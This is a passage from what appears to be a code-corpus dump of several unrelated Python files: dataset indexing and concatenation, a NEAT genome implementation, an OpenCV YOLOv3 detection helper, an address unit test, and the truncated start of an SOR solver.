:obj:`int`):\n Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2.\n custom_index (Optional :obj:`faiss.Index`):\n Custom Faiss index that you already have instantiated and configured for your needs.\n train_size (Optional :obj:`int`):\n If the index needs a training step, specifies how many vectors will be used to train the index.\n faiss_verbose (:obj:`bool`, defaults to False):\n Enable the verbosity of the Faiss index.\n dtype (data-type): The dtype of the numpy arrays that are indexed.\n Default is ``np.float32``.\n\n Example::\n\n ds = datasets.load_dataset('crime_and_punish', split='train')\n ds_with_embeddings = ds.map(lambda example: {'embeddings': embed(example['line']}))\n ds_with_embeddings.add_faiss_index(column='embeddings')\n # query\n scores, retrieved_examples = ds_with_embeddings.get_nearest_examples('embeddings', embed('my new query'), k=10)\n # save index\n ds_with_embeddings.save_faiss_index('embeddings', 'my_index.faiss')\n\n ds = datasets.load_dataset('crime_and_punish', split='train')\n # load index\n ds.load_faiss_index('embeddings', 'my_index.faiss')\n # query\n scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10)\n \"\"\"\n with self.formatted_as(type=\"numpy\", columns=[column], dtype=dtype):\n super().add_faiss_index(\n column=column,\n index_name=index_name,\n device=device,\n string_factory=string_factory,\n metric_type=metric_type,\n custom_index=custom_index,\n train_size=train_size,\n faiss_verbose=faiss_verbose,\n )\n return self\n\n def add_faiss_index_from_external_arrays(\n self,\n external_arrays: np.array,\n index_name: str,\n device: Optional[int] = None,\n string_factory: Optional[str] = None,\n metric_type: Optional[int] = None,\n custom_index: Optional[\"faiss.Index\"] = None, # noqa: F821\n train_size: Optional[int] = None,\n faiss_verbose: bool = False,\n dtype=np.float32,\n ):\n \"\"\"Add a dense index using Faiss for fast retrieval.\n The index is created using the vectors of `external_arrays`.\n You can specify `device` if you want to run it on GPU (`device` must be the GPU index).\n You can find more information about Faiss here:\n - For `string factory `__\n\n Args:\n external_arrays (:obj:`np.array`):\n If you want to use arrays from outside the lib for the index, you can set :obj:`external_arrays`.\n It will use :obj:`external_arrays` to create the Faiss index instead of the arrays in the given :obj:`column`.\n index_name (:obj:`str`):\n The index_name/identifier of the index.\n This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`.\n device (Optional :obj:`int`):\n If not None, this is the index of the GPU to use.\n By default it uses the CPU.\n string_factory (Optional :obj:`str`):\n This is passed to the index factory of Faiss to create the index.\n Default index class is ``IndexFlat``.\n metric_type (Optional :obj:`int`):\n Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2.\n custom_index (Optional :obj:`faiss.Index`):\n Custom Faiss index that you already have instantiated and configured for your needs.\n train_size (Optional :obj:`int`):\n If the index needs a training step, specifies how many vectors will be used to train the index.\n faiss_verbose (:obj:`bool`, defaults to False):\n Enable the verbosity of the Faiss index.\n dtype (:obj:`numpy.dtype`): The dtype of the numpy arrays that are indexed. Default is np.float32.\n \"\"\"\n super().add_faiss_index_from_external_arrays(\n external_arrays=external_arrays.astype(dtype),\n index_name=index_name,\n device=device,\n string_factory=string_factory,\n metric_type=metric_type,\n custom_index=custom_index,\n train_size=train_size,\n faiss_verbose=faiss_verbose,\n )\n\n def add_elasticsearch_index(\n self,\n column: str,\n index_name: Optional[str] = None,\n host: Optional[str] = None,\n port: Optional[int] = None,\n es_client: Optional[\"elasticsearch.Elasticsearch\"] = None, # noqa: F821\n es_index_name: Optional[str] = None,\n es_index_config: Optional[dict] = None,\n ):\n \"\"\"Add a text index using ElasticSearch for fast retrieval. This is done in-place.\n\n Args:\n column (:obj:`str`):\n The column of the documents to add to the index.\n index_name (Optional :obj:`str`):\n The index_name/identifier of the index.\n This is the index name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`.\n By default it corresponds to :obj:`column`.\n documents (:obj:`Union[List[str], datasets.Dataset]`):\n The documents to index. It can be a :class:`datasets.Dataset`.\n es_client (:obj:`elasticsearch.Elasticsearch`):\n The elasticsearch client used to create the index.\n es_index_name (Optional :obj:`str`):\n The elasticsearch index name used to create the index.\n es_index_config (Optional :obj:`dict`):\n The configuration of the elasticsearch index.\n Default config is:\n\n Config::\n\n {\n \"settings\": {\n \"number_of_shards\": 1,\n \"analysis\": {\"analyzer\": {\"stop_standard\": {\"type\": \"standard\", \" stopwords\": \"_english_\"}}},\n },\n \"mappings\": {\n \"properties\": {\n \"text\": {\n \"type\": \"text\",\n \"analyzer\": \"standard\",\n \"similarity\": \"BM25\"\n },\n }\n },\n }\n\n Example::\n\n es_client = elasticsearch.Elasticsearch()\n ds = datasets.load_dataset('crime_and_punish', split='train')\n ds.add_elasticsearch_index(column='line', es_client=es_client, es_index_name=\"my_es_index\")\n scores, retrieved_examples = ds.get_nearest_examples('line', 'my new query', k=10)\n\n \"\"\"\n with self.formatted_as(type=None, columns=[column]):\n super().add_elasticsearch_index(\n column=column, host=host, port=port, es_client=es_client, index_name=index_name\n )\n return self\n\n\ndef concatenate_datasets(\n dsets: List[Dataset],\n info: Optional[Any] = None,\n split: Optional[Any] = None,\n):\n \"\"\"\n Converts a list of :obj:``datasets.Dataset`` with the same schema into a single :obj:``datasets.Dataset``.\n\n Args:\n dsets (:obj:``List[datasets.Dataset]``): A list of Datasets to concatenate\n info (:obj:``datasets.DatasetInfo``, `optional`, defaults to :obj:``None``): If specified, the dataset info containing info like\n description, citation, etc.\n split (:obj:``datasets.NamedSplit``, `optional`, defaults to :obj:``None``): If specified, the name of the dataset split.\n \"\"\"\n if not all([dset.features.type == dsets[0].features.type for dset in dsets]):\n raise ValueError(\"Features must match for all datasets\")\n\n # Datasets tables should all come from disk or memory, but not a mix\n\n dsets_in_memory = [not dset._data_files for dset in dsets]\n if any(dset_in_memory != dsets_in_memory[0] for dset_in_memory in dsets_in_memory):\n raise ValueError(\n \"Datasets should ALL come from memory, or should ALL come from disk.\\n\"\n \"However datasets {} come from memory and datasets {} come from disk.\".format(\n [i for i in range(len(dsets)) if dsets_in_memory[i]],\n [i for i in range(len(dsets)) if not dsets_in_memory[i]],\n )\n )\n\n # Find common format or reset format\n\n format = dsets[0].format\n if any(dset.format != format for dset in dsets):\n format = {}\n logger.info(\"Some of the datasets have disparate format. Resetting the format of the concatenated dataset.\")\n\n # Concatenate tables\n\n table = pa.concat_tables(dset._data for dset in dsets if len(dset._data) > 0)\n data_files = [f for dset in dsets for f in dset._data_files]\n inplace_history = [h for dset in dsets for h in dset._inplace_history]\n\n def apply_offset_to_indices_table(table, offset):\n if offset == 0:\n return table\n else:\n array = table[\"indices\"]\n if isinstance(array, pa.ChunkedArray):\n new_array = pa.array(np.concatenate([c.to_numpy() for c in array.chunks]) + offset, pa.uint64())\n else:\n new_array = pa.array(array.to_numpy() + offset, pa.uint64())\n return pa.Table.from_arrays([new_array], names=[\"indices\"])\n\n # Concatenate indices if they exist\n\n if any(dset._indices is not None for dset in dsets):\n\n # Datasets indices tables should all come from disk or memory, but not a mix\n # Datasets with no indices tables are replaced with a dataset with an indicies table in memory\n\n indices_mappings_in_memory = [not dset._indices_data_files for dset in dsets]\n if any(\n indices_mapping_in_memory != indices_mappings_in_memory[0]\n for indices_mapping_in_memory in indices_mappings_in_memory\n ):\n raise ValueError(\n \"Datasets' indices should ALL come from memory, or should ALL come from disk.\\n\"\n \"However datasets' indices {} come from memory and datasets' indices {} come from disk.\".format(\n [i for i in range(len(dsets)) if indices_mappings_in_memory[i]],\n [i for i in range(len(dsets)) if not indices_mappings_in_memory[i]],\n )\n )\n indices_in_memory = indices_mappings_in_memory[0]\n\n # Create missing indices tables in memory\n\n if indices_in_memory:\n for i in range(len(dsets)):\n if dsets[i]._indices is None:\n dsets[i] = dsets[i].select(range(len(dsets[i])))\n assert all(dset._indices is not None for dset in dsets), \"each dataset should have an indices table\"\n\n # An offset needs to be applied to the indices before concatenating\n\n indices_tables = []\n offset = 0\n for dset in dsets:\n indices_tables.append(apply_offset_to_indices_table(dset._indices, offset))\n offset += len(dset._data)\n\n # Concatenate indices\n\n indices_tables = [t for t in indices_tables if len(t) > 0]\n if indices_tables:\n indices_table = pa.concat_tables(indices_tables)\n else:\n indices_table = pa.Table.from_batches([], schema=pa.schema({\"indices\": pa.int64()}))\n indices_data_files = None # can't reuse same files as an offset was applied\n else:\n indices_table = None\n indices_data_files = None\n if info is None:\n info = DatasetInfo.from_merge([dset.info for dset in dsets])\n fingerprint = update_fingerprint(\n \"\".join(dset._fingerprint for dset in dsets), concatenate_datasets, {\"info\": info, \"split\": split}\n )\n concatenated_dataset = Dataset(\n table,\n info=info,\n split=split,\n data_files=data_files,\n indices_table=indices_table,\n indices_data_files=indices_data_files,\n fingerprint=fingerprint,\n inplace_history=inplace_history,\n )\n concatenated_dataset.set_format(**format)\n return concatenated_dataset\n\n\n# This is outside Dataset.filter as it needs to be picklable for multiprocessing\n\n# transform the filter function into the map function\ndef map_function(batch, *args, function=None, with_indices=None, **fn_kwargs):\n assert function is not None and with_indices is not None\n result = defaultdict(list)\n num_examples = len(batch[next(iter(batch.keys()))])\n input_columns = fn_kwargs.pop(\"input_columns\", None)\n\n # create single examples\n for i in range(num_examples):\n example = map_nested(lambda x: x[i], batch, dict_only=True)\n fn_args = [example] if input_columns is None else [example[col] for col in input_columns]\n\n # check if example should be filtered or not\n if with_indices:\n keep_example = function(*fn_args, args[0][i], **fn_kwargs)\n else:\n keep_example = function(*fn_args, **fn_kwargs)\n\n assert isinstance(\n keep_example, bool\n ), f\"The filter function returns a variable of type {type(keep_example)}, but should return a variable of type `bool`.\"\n # if example shall be kept add to result\n if keep_example:\n for key in batch.keys():\n result[key].append(example[key])\n\n # if no example shall be kept, init with empty list\n if bool(result) is False:\n for key in batch.keys():\n result[key] = []\n\n return result\n","repo_name":"MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020","sub_path":"venv/lib/python3.6/site-packages/datasets/arrow_dataset.py","file_name":"arrow_dataset.py","file_ext":"py","file_size_in_byte":125607,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27417817750","text":"\"\"\"Implementation based on NEAT-Python neat-python/neat/genome.py:\nhttps://github.com/CodeReclaimers/neat-python/blob/master/neat/genome.py\"\"\"\n\nimport random\nimport sys\nfrom itertools import count\n\nimport neuroevolution.activation_functions as activation_functions\nimport neuroevolution.aggregations as aggregations\nimport neuroevolution.genes as genes\nimport neuroevolution.graphs as graphs\nfrom neuroevolution.config import ConfigParameter, write_pretty_params\n\n\n\n\nclass DefaultGenomeConfig:\n allowed_connectivity = [\"unconnnected\", \"fs_neat_nohidden\", \"fs_neat\", \"fs_neat_hidden\", \"full_nodirect\",\n \"full\", \"full_direct\", \"partial_nodirect\", \"partial\", \"partial_direct\"]\n\n def __init__(self, params):\n self.activation_defs = activation_functions.str_to_activation\n self.aggregation_defs = aggregations.str_to_aggregation\n self._params = [ConfigParameter(\"n_in\", int),\n ConfigParameter(\"n_out\", int),\n ConfigParameter(\"n_hid\", int),\n ConfigParameter(\"feed_forward\", bool),\n ConfigParameter(\"compatibility_disjoint_coefficient\", float),\n ConfigParameter(\"compatibility_weight_coefficient\", float),\n ConfigParameter(\"conn_add_prob\", float),\n ConfigParameter(\"conn_delete_prob\", float),\n ConfigParameter(\"node_add_prob\", float),\n ConfigParameter(\"node_delete_prob\", float),\n ConfigParameter(\"single_structural_mutation\", bool, \"false\"),\n ConfigParameter(\"structural_mutation_surer\", str, \"default\"),\n ConfigParameter(\"initial_connection\", str, \"unconnected\")]\n\n self.node_gene_type = params[\"node_gene_type\"]\n self._params += self.node_gene_type.get_config_params()\n self.connection_gene_type = params[\"connection_gene_type\"]\n self._params += self.connection_gene_type.get_config_params()\n\n for p in self._params:\n setattr(self, p.name, p.interpret(params))\n\n self.input_keys = [-i - 1 for i in range(self.n_in)]\n self.output_keys = [i for i in range(self.n_out)]\n\n self.connection_fraction = None\n\n if \"partial\" in self.initial_connection:\n c, p = self.initial_connection.split()\n self.initial_connection = c\n self.connection_fraction = float(p)\n if not (0 <= self.connection_fraction <= 1):\n raise RuntimeError(\"'partial' connection must between [0.0, 1.0]\")\n\n assert self.initial_connection in self.allowed_connectivity\n\n if self.structural_mutation_surer.lower() in [\"true\", \"1\", \"yes\", \"on\"]:\n self.structural_mutation_surer = \"true\"\n elif self.structural_mutation_surer.lower() in [\"false\", \"0\", \"no\", \"off\"]:\n self.structural_mutation_surer = \"false\"\n elif self.structural_mutation_surer.lower() == \"default\":\n self.structural_mutation_surer = \"default\"\n else:\n raise RuntimeError(\"Invalid structural_mutation_surer %r\" % self.structural_mutation_surer)\n\n self.node_indexer = None\n\n def add_activation(self, name, func):\n self.activation_defs[name] = func\n\n def add_aggregation(self, name, func):\n self.aggregation_defs[name] = func\n\n def save(self, f):\n if 'partial' in self.initial_connection:\n if not (0 <= self.connection_fraction <= 1):\n raise RuntimeError(\"'partial' connection value must be between [0.0, 1.0]\")\n f.write(\"initial_connection = {0} {1} \\n\".format(self.initial_connection, self.connection_fraction))\n else:\n f.write(\"initial_connection = {0} \\n\".format(self.initial_connection))\n\n assert self.initial_connection in self.allowed_connectivity\n write_pretty_params(f, self, [p for p in self._params if \"initial_connection\" not in p.name])\n\n def get_new_node_key(self, node_dict):\n if self.node_indexer is None:\n self.node_indexer = count(max(list(node_dict.keys())) + 1)\n new_id = next(self.node_indexer)\n assert new_id not in node_dict\n return new_id\n\n def check_structural_mutation_surer(self):\n if self.structural_mutation_surer == \"true\":\n return True\n elif self.structural_mutation_surer == \"false\":\n return False\n elif self.structural_mutation_surer == \"default\":\n return self.single_structural_mutation\n else:\n raise RuntimeError(\"Invalid structural_mutation_surer {!r}\".format(self.structural_mutation_surer))\n\n\n\n\nclass DefaultGenome:\n def __init__(self, key):\n self.key = key\n self.connections = {}\n self.nodes = {}\n self.fitness = None\n\n def __str__(self):\n string = \"Key: {0}\\nFitness: {1}\\nNodes:\".format(self.key, self.fitness)\n for k, ng in self.nodes.items():\n string += \"\\n\\t{0} {1!s}\".format(k, ng)\n string += \"\\nConnections:\"\n connections = list(self.connections.values())\n connections.sort()\n for c in connections:\n string += \"\\n\\t\" + str(c)\n return string\n\n @classmethod\n def parse_config(cls, param_dict):\n param_dict['node_gene_type'] = genes.DefaultNodeGene\n param_dict['connection_gene_type'] = genes.DefaultConnectionGene\n return DefaultGenomeConfig(param_dict)\n\n @classmethod\n def write_config(cls, f, config):\n config.save(f)\n\n def configure_new(self, config):\n for node_key in config.output_keys:\n self.nodes[node_key] = self.create_node(config, node_key)\n\n if config.n_hid > 0:\n for i in range(config.n_hid):\n node_key = config.get_new_node_key(self.nodes)\n assert node_key not in self.nodes\n node = self.create_node(config, node_key)\n self.nodes[node_key] = node\n\n if \"fs_neat\" in config.initial_connection:\n if config.initial_connection == \"fs_neat_nohidden\":\n self.connect_fs_neat_nohidden(config)\n elif config.initial_connection == \"fs_neat_hidden\":\n self.connect_fs_neat_hidden(config)\n else:\n if config.n_hid > 0:\n print(\"Warning: initial_connection = fs_neat won't connect to hidden nodes;\",\n \"\\tif this is desired, set initial_connection = fs_nohidden;\",\n \"\\tif if not, set initial_connection = fs_neat_hidden\", sep=\"\\n\", file=sys.stderr)\n self.connect_partial_nodirect(config)\n\n elif \"full\" in config.initial_connection:\n if config.initial_connection == \"full_nodirect\":\n self.connect_full_nodirect(config)\n elif config.initial_connection == \"full_direct\":\n self.connect_full_direct(config)\n else:\n if config.n_hid > 0:\n print(\"Warning: initial_connection = full w/ hid nodes won't do direct inp-outp connections;\",\n \"\\tif this is desired, set initial_connection = full_nodirect;\",\n \"\\tif not, set initial_connection = full_direct\", sep='\\n', file=sys.stderr)\n self.connect_full_nodirect(config)\n\n elif \"partial\" in config.initial_connection:\n if config.initial_connection == \"partial_nodirect\":\n self.connect_partial_nodirect(config)\n elif config.initial_connection == \"partial_direct\":\n self.connect_partial_direct(config)\n else:\n if config.n_hid > 0:\n print(\"Warning: initial_connection = partial with hidden nodes will\\\n not do direct input-output connections;\",\n \"\\tif this is desired, set initial_connection = partial_nodirect {0};\".format(\n config.connection_fraction),\n \"\\tif not, set initial_connection = partial_direct {0}\".format(\n config.connection_fraction),\n sep='\\n', file=sys.stderr)\n self.connect_partial_nodirect(config)\n\n def configure_crossover(self, genome1, genome2, config):\n assert isinstance(genome1.fitness, (int, float))\n assert isinstance(genome2.fitness, (int, float))\n if genome1.fitness > genome2.fitness:\n parent1, parent2 = genome1, genome2\n else:\n parent1, parent2 = genome2, genome1\n\n for key, cg1 in parent1.connections.items():\n cg2 = parent2.connections.get(key) #'.get(key)' instead of '[key]' to return None if '[key]' doesn't exist\n if cg2 is None: # excess or disjoint gene, copy from fittest parent\n self.connections[key] = cg1.copy()\n else: # homologous gene, combine parents' genes\n self.connections[key] = cg1.crossover(cg2)\n\n parent1_set = parent1.nodes\n parent2_set = parent2.nodes\n\n for key, ng1 in parent1_set.items():\n ng2 = parent2_set.get(key)\n assert key not in self.nodes\n if ng2 is None: #extra gene, copy from fittest parent\n self.nodes[key] = ng1.copy()\n else: #homologous gene, combine parents' genes\n self.nodes[key] = ng1.crossover(ng2)\n\n def mutate(self, config):\n if config.single_structural_mutation:\n div = max(1, (config.node_add_prob + config.node_delete_prob +\n config.conn_add_prob + config.conn_delete_prob))\n r = random.random()\n if r < (config.node_add_prob / div):\n self.mutate_add_node(config)\n elif r < ((config.node_add_prob + config.node_delete_prob) / div):\n self.mutate_delete_node(config)\n elif r < ((config.node_add_prob + config.node_delete_prob + config.conn_add_prob) / div):\n self.mutate_add_connection(config)\n elif r < ((config.node_add_prob + config.node_delete_prob +\n config.conn_add_prob + config.conn_delete_prob) / div):\n self.mutate_delete_connection(config)\n else:\n if random.random() < config.node_add_prob:\n self.mutate_add_node(config)\n if random.random() < config.node_delete_prob:\n self.mutate_delete_node(config)\n if random.random() < config.conn_add_prob:\n self.mutate_add_connection(config)\n if random.random() < config.conn_delete_prob:\n self.mutate_delete_connection(config)\n\n for cg in self.connections.values(): # mutate connection genes\n cg.mutate(config)\n\n for ng in self.nodes.values(): # mutate node genes\n ng.mutate(config)\n\n def mutate_add_node(self, config):\n if not self.connections:\n if config.check_structural_mutation_surer():\n self.mutate_add_connection(config)\n return\n\n conn2split = random.choice(list(self.connections.values()))\n new_n_key = config.get_new_node_key(self.nodes)\n ng = self.create_node(config, new_n_key)\n self.nodes[new_n_key] = ng\n\n conn2split.enabled = False\n in_n, out_n = conn2split.key\n # connects in_n node with new node with weight=1.0 & new node with out_n with old weight bewteen in_n and out_n\n self.add_connection(config, in_n, new_n_key, 1.0, True)\n self.add_connection(config, new_n_key, out_n, conn2split.weight, True)\n\n def add_connection(self, config, in_key, out_key, weight, enabled):\n assert isinstance(in_key, int)\n assert isinstance(out_key, int)\n assert out_key >= 0\n assert isinstance(enabled, bool)\n\n key = (in_key, out_key)\n connection = config.connection_gene_type(key)\n connection.init_attributes(config)\n connection.weight = weight\n connection.enabled = enabled\n self.connections[key] = connection\n\n def mutate_delete_node(self, config):\n available_nodes = [k for k in self.nodes.keys() if k not in config.output_keys]\n if not available_nodes:\n return -1\n del_key = random.choice(available_nodes)\n conn2del = set()\n for key, value in self.connections.items():\n if del_key in value.key:\n conn2del.add(value.key)\n for key in conn2del:\n del self.connections[key]\n del self.nodes[del_key]\n return del_key\n\n def mutate_add_connection(self, config):\n possible_outputs = list(self.nodes.keys())\n out_node = random.choice(possible_outputs)\n possible_inputs = possible_outputs + config.input_keys\n in_node = random.choice(possible_inputs)\n\n key = (in_node, out_node)\n # avoids duplicating connections\n if key in self.connections:\n if config.check_structural_mutation_surer():\n self.connections[key].enabled = True\n return\n # avoids connecting two output nodes\n if in_node in config.output_keys and out_node in config.output_keys:\n return\n # avoids creating cycles for feed forward networks\n if config.feed_forward and graphs.creates_cycle(list(self.connections.keys()), key):\n return\n\n cg = self.create_connection(config, in_node, out_node)\n self.connections[cg.key] = cg\n\n def mutate_delete_connection(self, config):\n if self.connections:\n key = random.choice(list(self.connections.keys()))\n del self.connections[key]\n\n def distance(self, other, config):\n node_distance = 0.0\n if self.nodes or other.nodes:\n disjoint_nodes = 0\n for k2 in other.nodes.keys():\n if k2 not in self.nodes:\n disjoint_nodes += 1\n for k1, n1 in self.nodes.items():\n n2 = other.nodes.get(k1)\n if n2 is None:\n disjoint_nodes += 1\n else:\n node_distance += n1.distance(n2, config)\n\n max_nodes = max(len(self.nodes), len(other.nodes))\n node_distance = (node_distance + (config.compatibility_disjoint_coefficient * disjoint_nodes)) / max_nodes\n\n connection_distance = 0.0\n if self.connections or other.connections:\n disjoint_connections = 0\n for k2 in other.connections.keys():\n if k2 not in self.connections.keys():\n disjoint_connections += 1\n for k1, c1 in self.connections.items():\n c2 = other.connections.get(k1)\n if c2 is None:\n disjoint_connections += 1\n else:\n connection_distance += c1.distance(c2, config)\n\n max_connections = max(len(self.connections), len(other.connections))\n connection_distance = (connection_distance +\n (config.compatibility_disjoint_coefficient *\n disjoint_connections)) /max_connections\n\n distance = node_distance + connection_distance\n return distance\n\n def size(self):\n n_enabled_conn = sum([1 for cg in self.connections.values() if cg.enabled])\n return len(self.nodes), n_enabled_conn\n\n @staticmethod\n def create_node(config, node_key):\n node = config.node_gene_type(node_key)\n node.init_attributes(config)\n return node\n\n @staticmethod\n def create_connection(config, in_key, out_key):\n connection = config.connection_gene_type((in_key, out_key))\n connection.init_attributes(config)\n return connection\n\n def connect_fs_neat_nohidden(self, config):\n in_key = random.choice(config.input_keys)\n for out_key in config.output_keys:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_fs_neat_hidden(self, config):\n in_key = random.choice(config.input_keys)\n others = [i for i in self.nodes.keys() if i not in config.input_keys]\n for out_key in others:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def compute_full_connections(self, config, direct):\n hidden = [i for i in self.nodes.keys() if i not in config.output_keys]\n output = [i for i in self.nodes.keys() if i in config.output_keys]\n connections = []\n if direct or (not hidden): # direct connections\n for in_key in config.input_keys:\n for out_key in config.output_keys:\n connections.append((in_key, out_key))\n if hidden: # hidden connections\n for in_key in config.input_keys:\n for h in hidden:\n connections.append((in_key, h))\n for h in hidden:\n for out_key in config.output_keys:\n connections.append((h, out_key))\n if not config.feed_forward: # self-connections in RNNs\n for i in self.nodes.keys():\n connections.append((i, i))\n\n return connections\n\n def connect_full_nodirect(self, config):\n for in_key, out_key in self.compute_full_connections(config, False):\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_full_direct(self, config):\n for in_key, out_key in self.compute_full_connections(config, True):\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_partial_nodirect(self, config):\n assert 0 <= config.connection_fraction <= 1\n all_connections = self.compute_full_connections(config, False)\n random.shuffle(all_connections)\n n2add = int(round(len(all_connections) * config.connection_fraction))\n for in_key, out_key in all_connections[:n2add]:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n\n def connect_partial_direct(self, config):\n assert 0 <= config.connection_fraction <= 1\n all_connections = self.compute_full_connections(config, True)\n random.shuffle(all_connections)\n n2add = int(round(len(all_connections) * config.connection_fraction))\n for in_key, out_key in all_connections[:n2add]:\n connection = self.create_connection(config, in_key, out_key)\n self.connections[connection.key] = connection\n","repo_name":"inigo-irigaray/NEAT-neuroevolution-pytorch","sub_path":"neuroevolution/genome.py","file_name":"genome.py","file_ext":"py","file_size_in_byte":18884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19952519149","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING, List\nif TYPE_CHECKING:\n from CV_Robot.vision import VisionObject\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport copy\nimport cv2\nimport os\n\nfrom CV_Robot import useLiveImg, is_Server, is_Robot\n\nfig = None\nax = None\n\nimg_typ = np.ndarray\n\ndef load_model():\n \"\"\"\n Loads Yolo v3 model (called automtically on import)\n \"\"\"\n yolov3_path = os.path.dirname(__file__) + '/Models/Yolo v3/'\n try:\n with open(yolov3_path + 'yolov3.weights'):\n pass\n except FileNotFoundError:\n print(\"Downloading model...\")\n import wget\n import sys\n def bar_custom(current, total, _): #_ = width\n sys.stdout.write(\"\\r\")\n sys.stdout.write(\"Downloading: %d%% [%d / %d] bytes\" % (current / total * 100, current, total))\n\n wget.download('https://pjreddie.com/media/files/yolov3.weights', yolov3_path + 'yolov3.weights', bar=bar_custom)\n print()\n\n net: cv2.dnn_Net = cv2.dnn.readNet(yolov3_path + \"yolov3.weights\", yolov3_path + \"yolov3.cfg\")\n with open(yolov3_path + \"yolov3.names\", \"r\") as f:\n classes = [line.strip() for line in f.readlines()]\n\n output_layers = [layer_name for layer_name in net.getUnconnectedOutLayersNames()]\n return net, classes, output_layers\n\ncache = []\ndef detect_objects(img: img_typ, net: cv2.dnn_Net, outputLayers: list):\n \"\"\"\n Returns DNN outputs for finding objects in image, uses cache if possible\n \"\"\"\n retval = None\n for c_img, c_outputs in cache:\n if np.array_equal(img, c_img):\n retval = c_outputs\n\n if retval is None:\n blob = cv2.dnn.blobFromImage(img, scalefactor=0.00392, size=(320, 320), mean=(0, 0, 0), swapRB=True, crop=False)\n net.setInput(blob)\n retval = net.forward(outputLayers)\n\n if len(cache) >= 5:\n cache.pop(0)\n cache.append((img, retval))\n\n return retval\n\ndef get_box_dimensions(outputs: list, thresh: float = 0.3):\n \"\"\"\n Returns X, Y, width, height of objects\n \"\"\"\n boxes = []\n confs = []\n class_ids = []\n for output in outputs:\n for detect in output:\n scores = detect[5:]\n class_id = np.argmax(scores)\n conf = scores[class_id]\n if conf > thresh:\n center_x = detect[0] * 100\n center_y = detect[1] * 100\n w = round(detect[2] * 100, 3)\n h = round(detect[3] * 100, 3)\n x = round(center_x - w / 2, 3)\n y = round(center_y - h / 2, 3)\n boxes.append([x, y, w, h])\n confs.append(float(conf))\n class_ids.append(class_id)\n return boxes, confs, class_ids\n\ndef show_image(img: img_typ, pause: bool =False):\n \"\"\"\n Displays Matplotlib render of image\n If on Colab - display in new figure\n If on Server - display in exisiting figure with optional pause\n If on Robot - save as \"cv_robot_img.py\"\n \"\"\"\n global fig\n global ax\n\n if is_Robot or (is_Server and not useLiveImg):\n with open('userscripts/img.lck', 'w+') as f:\n f.write(\"lck\")\n cv2.imwrite(\"userscripts/cv_robot_img.png\", img)\n with open('userscripts/img.lck', 'w+') as f:\n f.write(\"\")\n return\n\n t_img = img[:, :, ::-1] # convert BGR (for opencv) to RGB (for matplotlib)\n if fig is None or not plt.fignum_exists(fig.number):\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot()\n ax.clear()\n ax.imshow(t_img)\n\n x_space = img.shape[1] * 0.25\n y_space = img.shape[0] * 0.25\n\n ax.set_xticks([i * x_space for i in range(0, 5)], minor=False)\n ax.set_yticks([i * y_space for i in range(0, 5)], minor=False)\n ax.set_xticklabels(list(range(0, 101, 25)), fontdict=None, minor=False)\n ax.set_yticklabels(list(range(0, 101, 25)), fontdict=None, minor=False)\n\n if is_Server and not pause:\n plt.draw()\n plt.pause(0.1)\n else:\n plt.show()\n\n\n\ndef draw_labels(objects: List[VisionObject], img: img_typ, pause: bool = False):\n \"\"\"\n Draw labeled boxes on image\n \"\"\"\n global fig\n global ax\n\n img = copy.deepcopy(img)\n font = cv2.FONT_HERSHEY_PLAIN\n for index, obj in enumerate(objects):\n x, y, w, h = obj.BBox\n x = int(x * img.shape[1] / 100)\n w = int(w * img.shape[1] / 100)\n y = int(y * img.shape[0] / 100)\n h = int(h * img.shape[0] / 100)\n\n label = str(obj.Name)\n color = (0,0,255) #red\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\n cv2.putText(img, label, (x, y - 5), font, 1, color, 1)\n\n show_image(img, pause=pause)\n\n\n","repo_name":"RobertJN64/CV_Robot","sub_path":"CV_Robot/opencv_api.py","file_name":"opencv_api.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18203204082","text":"import pytest\n\nfrom pystarling.api_objects.Address import Address\n\n\nclass TestAddress(object):\n test_data = {\n 'streetAddress': '123 Fake St',\n 'city': 'Springfield',\n 'country': 'USA',\n 'postcode': 'N1 1AA'\n }\n\n incomplete_data = {\n 'city': 'Springfield'\n }\n\n def test_incomplete_data_raises_error(self):\n with pytest.raises(KeyError):\n Address(self.incomplete_data)\n\n def test_data_parsed_correctly(self):\n address = Address(self.test_data)\n assert address.street_address == '123 Fake St'\n assert address.city == 'Springfield'\n assert address.country == 'USA'\n assert address.postcode == 'N1 1AA'\n","repo_name":"rdcrt/pystarling","sub_path":"test/api_objects/test_Address.py","file_name":"test_Address.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33753464458","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom Proj2_part_1_01345671 import get_neighbours, SOR\n\n\nclass ModifiedSOR(SOR):\n\n def get_value(self, phi, i, j):\n x = i * self.dx - self.q\n y = j * self.dy\n\n ns = get_neighbours(phi, i, j)\n\n \"\"\"\n Require U_-1 = U_1 to apply Neumann boundary conditions\n \"\"\"\n rows, cols = phi.shape\n if j == cols - 1:\n ns.update({'n': phi[i, j - 1]})\n if j == 0:\n ns.update({'s': phi[i, j + 1]})\n if i == 0:\n ns.update({'w': phi[i + 1, j]})\n if i == rows - 1:\n ns.update({'e': phi[i - 1, j]})\n\n if 0 < x < 0.5 and 0.5 < x < 1:\n \"\"\"\n In this range the transformation has 